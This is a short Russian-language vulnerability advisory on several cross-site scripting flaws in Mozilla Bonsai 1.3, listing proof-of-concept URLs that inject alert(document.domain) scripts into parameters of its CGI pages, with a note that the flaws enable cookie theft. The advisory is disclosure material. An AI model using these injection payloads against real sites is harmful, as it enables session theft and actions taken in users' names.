Межсайтовый скриптинг в Mozilla Bonsai

Дата публикации:
22.08.2002
Дата изменения:
17.10.2006
Всего просмотров:
780
Опасность:
Наличие исправления:
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Описание: Сразу несколько возможностей межсайтового скриптинга обнаружено в утилите Bonsai от Mozilla. Любой код, эксплуатирующий эту уязвимость, будет выполнен в браузере пользователя в контексте уязвимого сайта. Уязвимость может использоваться для кражи куки, или выполнения других web web-based атак. Также становится возможным выполнять некоторые операции от имени пользователя Bonsai системы. Пример:
webtools/bonsai/cvslog.cgi?file=*&rev=&root=
<script>alert(document.domain)</script> 
/webtools/bonsai/cvslog.cgi?file=
<script>alert(document.domain)</script> 
/webtools/bonsai/cvsblame.cgi?file=/index.html&root=
<script>alert(document.domain)</script> 
/webtools/bonsai/cvsblame.cgi?file=
<script>alert(document.domain)</script> 
/cvsquery.cgi?branch=
<script>alert(document.domain)</script>&file=
<script>alert(document.domain)/script> 
&date=<script>alert(document.domain)</script> 
/cvsquery.cgi?module=<script>alert(document.domain)</script>
&branch=&dir=&file= 
&who=<script>alert(document.domain)</script>
&sortby=Date&hours=2&date=week 
/showcheckins.cgi?person=
<script>alert(document.domain)</script> 
/cvsqueryform.cgi?cvsroot=/cvsroot&module=
<script>alert(document.domain)</script>&branch=HEAD
уязвимость обнаружена в Mozilla Bonsai 1.3

Ссылки: Advisory: Bonsai XSS and Physical Path Revealing Vulnerabilities
или введите имя

CAPTCHA